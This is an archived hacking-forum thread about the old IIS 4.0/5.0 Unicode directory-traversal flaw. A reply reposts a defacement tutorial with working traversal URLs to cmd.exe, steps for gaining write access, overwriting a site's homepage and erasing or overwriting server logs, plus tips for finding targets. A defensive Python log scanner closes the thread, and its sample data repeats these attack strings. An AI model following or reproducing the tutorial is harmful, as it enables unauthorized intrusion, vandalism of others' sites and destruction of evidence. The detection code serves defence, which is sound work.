Full Version: IIS 4&5 Exploit
ThrillKill
Hi there. I started off with using IIS Unicode in IE. My question is: do versions 4 and 5 use the same Unicode exploit, or is there a different method and tool? IE is the only tool I know of using. Haha, maybe I am lazy or something.

Well, if you can post any replies to this, it is always welcome.
ThrillKill
Haha, well, seeing as no one is going to reply but it got about 39 views, I might as well delete this post.
Insectoid
Thrillkill, check out neworder:
neworder.box.sk
It's in the recent articles somewhere down on the homepage, "hacking iis a complete guide" or something like that. You should find the information you need there.
dozolax
Check out kotik for IIS.
Fareway
There are some very good tutorials about Unicode, especially because it's an oldie. Try Google and you'll find more than you can imagine ;-)
VorteX
Here is a little something to get you started; other good tuts can be found on www.ebcvg.com

Exploiting IIS Unicode Vulnerability by Mgrd


By combining a few tutorials I've found on the net, and with the great help I got from my friend TheGlitch, I'll be putting together this tutorial.

Well, the first step anyone should take when attempting to exploit a server is to learn about it and learn what the exploit does.

What Unicode Is:

Microsoft Internet Information Server (IIS) versions 4.0 and 5.0, which usually run on Windows NT4 and Windows 2k, all have the Unicode extensions installed by default. Unicode allows characters that are not used in the English language to be recognized by web servers. The Unicode IIS exploit allows users to run arbitrary commands on the target web servers. The Unicode extensions loaded on IIS servers are known to be vulnerable unless they are running the current patches within the server.

Exploit Usage:

Basically, the exploit is executed using the HTTP protocol. This means that you open up your internet browser, put in the web directory, then a specially crafted Unicode string, and some IIS commands. Don't worry if it's confusing; I'll explain this all later.

Example:

http://www.example.com/cgi-bin/.%252e/.%25.../c+dir+c:\

Time to break this down.

http://www.example.com  The vulnerable site running IIS 4.0 or 5.0 without a patched client. The best way to find an IIS site fire up www.google.com and search inurl:".asp" you're going to get a whole bunch of sites running IIS. To find out if the site is an IIS and what version it is. I suggest using a port scanner and scan for websource. My personal favorite for windows is Yet Another Port Scanner, or YAPS. For *nix its no doubt nmap, don't plan on using it if you aren't running a *nix OS on your computer, it needs root to run.

Cgi-bin  The web folder very important to the exploit. The main web folders where the exploit can be run from are: cgi-bin, msdac, _vti_cnf, scripts, and _vti_bin. These folders alone hold sensitive information, usually access to them is restricted to normal users.

.%252e/.%252e/.%252e/.%252e/.%252e/.%252e: this is the actual Unicode part of the attack. In the English language this is kinda like ./././ etc.

/winnt/system32/cmd.exe?: this is the most important part of the attack. For you Windows NT users, you should recognize this as your system files. This command allows you to execute the arbitrary code by talking to the DOS command line; nifty, ain't it ;-)

c+dir+c:\: these are the DOS commands. It's pretty much dir c:\ in IIS terminology. When we start the defacing process you will notice that c+command+text is the basic format of it.

Well, now that we have finished going over the first part of the exploit and broken it down, let's move on to start defacing.

Setup For the Defacing

We are going to need to find the web root to do anything to the site. It takes a lot of searching in most cases to find the root folder. Some of the more common places to look for the web root are C:\InetPub\wwwroot\ and D:\. Those who have built their own webpage (no, not a free one) will have no trouble finding the homepage; these include index.html, index.htm, default.htm, and default.html. Once you find the homepage, remember the location; you will need it later.

In my travels I found this bit from a tutorial and decided to put it in because it is very important.

"Important Personal Note: From all the pages I have defaced using this exploit, this is what I have noticed: even though you might have found the index.html, it might not truly be the index.html file, the reason being that a lot of administrators create mock webroots. This is to prevent their web site from being hacked. But there is a way to beat this: you will have to visit the web site and get the size of the web page itself. For those of you who don't know how to do that, all you do is right click and click on Properties. Now all you do is match up the byte size to the one you have found, and if it's the same size file, it's the true index.html; if not, keep searching to try and find the other one."

To make sure we have write access to the hard drives, we have to do the following step. Replace whatever you have after cmd.exe?/ with c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmd1.exe

Basically, all we did was copy cmd.exe to cmd1.exe; by doing this we confuse the system and it thinks we are the owner.

Replace cmd.exe?/ with cmd1.exe?/ and we are all set.

Now, to test our privileges, type c+echo+helow!+>+c:\test.txt after cmd1.exe?/

This command creates a file named test.txt in the C:\ root with the text helow! saved to it.

If you get an access denied error, then find another site to exploit.

Now we are ready to tag the site. Replace everything after cmd1.exe?/ with this.

C+echo+text+to+put+on+the+site+remember+no+html+>+c:\backup.htm

You can't use HTML to tag the site with Unicode, so it's just basic text. If you want to make your own templates and upload them to the site, then I might suggest exploiting a server to get root access to it.

Now, since we are about to deface, I'm going to throw in another snippet that's very important.

"Important Note: Always remember to clean the log files. Before even starting anything, I would suggest using a proxy server; this would keep you protected but not untraceable. A proxy server will make it harder for you to be found, but not impossible. So always remember to delete the log files or to overwrite them; you can do this by executing the following command.

The default log file is located in c:\WINNT\SYSTEM32\LOGFILES\, but I will almost guarantee they will not be there, so now you ask yourself, what can I do?

Well, it's simple: all you will have to do is execute this command and it should display the log files for you. The command is:

Cmd1.exe?/c+dir+/S+c:\*in020716.log (change this to comply with your date, yymmdd). This command should almost definitely find the server log files. I would recommend removing them completely, but you might not be able to do this, so I would then recommend echoing over them."

Now, since we've got all this down, I hope you know the risks: up to 2 years in jail if caught. Keep them cheeks tight.

Now for the last step to defacing the site.

A simple copy of backup.htm to the directory of the web root with the filename of the homepage.

The command is as follows:

c+copy+c:\backup.htm+c:\folder\to\webroot\homepage.html

Now go to the website; if your text is there, obviously the defacement worked. If not, you might have hit a decoy or (filtered) it up somehow; go back over the steps, you'll figure it out ;-)

If it was a success then go to http://www.zone-h.org/en/defacements/notify and notify zone-h of the hack. It'll give ya some recognition :-D.

Thoughts Manifested 0wns ya'll. Greetz to ref0rm, TheGlitch, dr00t, and all of my fallen boys.

Contact:
IRC: EFnet mgrd

My Sources:
TheGlitch, C0ldPhaTe's tutorial on Unicode exploiting, and ref0rm's tip on the Google .asp trick to find an IIS site
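The tutorial above describes the attack from the browser's side. What actually makes `.%252e` and `..%c0%af` work is a canonicalization-order bug: the server checked the request path for `..` after decoding it once, and only later turned `%2e` into `.` and the overlong byte pair `c0 af` into `/`. The following is an added example, not part of VorteX's post or Mgrd's tutorial: a Python canonicalizer that decodes to a fixed point (the way a correct check has to), a simplified model of the single-decode check the attack slips past (not IIS's actual code), and a scan over constructed W3C-format log lines of the kind the tutorial says live under the LOGFILES directory. The `msadc` path, the IPs, timestamps and file names in the sample are made up.

```python
"""Canonicalize IIS request paths and flag Unicode / double-decode traversal.

Added example (not from the original post). The log lines below are constructed
for illustration, and legacy_check_passes() is a simplified model of the
pre-patch check, not IIS's own code.
"""
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 forms that a conforming decoder rejects but the unpatched IIS
# decoder accepted: %c0%af -> '/', %c1%9c -> '\'. Lead bytes are restricted so
# the folded value always fits in one ASCII byte.
_OVERLONG2 = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
_OVERLONG3 = re.compile(rb"\xe0[\x80\x81][\x80-\xbf]")


def _fold_overlong(data: bytes) -> bytes:
    """Replace overlong UTF-8 sequences with the ASCII byte they encode."""
    data = _OVERLONG3.sub(
        lambda m: bytes([((m.group(0)[1] & 0x3F) << 6) | (m.group(0)[2] & 0x3F)]),
        data)
    return _OVERLONG2.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(0)[1] & 0x3F)]),
        data)


def canonicalize(path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the path stops changing (so %252e -> %2e -> .),
    folding overlong UTF-8 each round, then normalise '\\' to '/' and case.
    Deliberately aggressive: this is the detection side, not a file server."""
    current = path.encode("latin-1", "replace")
    for _ in range(max_rounds):
        nxt = _fold_overlong(unquote_to_bytes(current))
        if nxt == current:
            break
        current = nxt
    return current.decode("latin-1").replace("\\", "/").lower()


def legacy_check_passes(path: str) -> bool:
    """Simplified model of the pre-patch IIS check: decode once, split on
    separators, reject only a literal '..' component. It never sees the second
    decoding round, and the bytes c0 af are not a separator to it."""
    once = unquote_to_bytes(path)
    return not any(part == b".." for part in re.split(rb"[/\\]", once))


def classify(path: str) -> list[str]:
    """Reasons a raw cs-uri-stem looks like a Unicode/double-decode attack."""
    canon = canonicalize(path)
    reasons = []
    if "/../" in canon or canon.endswith("/.."):
        reasons.append("traversal")
    if re.search(r"/system32/[^/]+\.exe$", canon):
        reasons.append("system32-exe")  # catches renamed copies like cmd1.exe
    if "%25" in path.lower():
        reasons.append("double-encoded")
    if re.search(r"%c[01]%[89ab][0-9a-f]|%e0%8[01]%", path, re.I):
        reasons.append("overlong-utf8")
    return reasons


# Constructed W3C extended log lines (not from any real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-16 12:00:01 10.0.0.5 GET /default.asp - 200
2002-07-16 12:00:07 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-16 12:00:09 10.0.0.9 GET /cgi-bin/.%252e/.%252e/.%252e/winnt/system32/cmd1.exe /c+echo+x+>+c:\\test.txt 200
2002-07-16 12:00:12 10.0.0.5 GET /images/logo.gif - 304
2002-07-16 12:00:15 10.0.0.9 GET /msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe /c+dir 404
"""


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, raw uri-stem, reasons) for each suspicious request,
    regardless of status code: a 404 is still an attempt worth alerting on."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem = fields[2], fields[4]
        reasons = classify(stem)
        if reasons:
            hits.append((ip, stem, reasons))
    return hits


if __name__ == "__main__":
    for ip, stem, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> {reasons} "
              f"(bypasses legacy check: {legacy_check_passes(stem)})")
```

All three attack lines in the sample pass `legacy_check_passes` and are caught by `classify`, which is the whole bug in two function calls. Note that the detector keys on any `.exe` under `system32` in the canonical path rather than the literal string `cmd.exe`, because the tutorial's copy-to-`cmd1.exe` step would otherwise walk straight past a signature, and that it canonicalizes before matching, so the `%255c` and `%c0%af` spellings land on the same rule as a plain `../`.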

Invision Power Board © 2001-2005 Invision Power Services, Inc.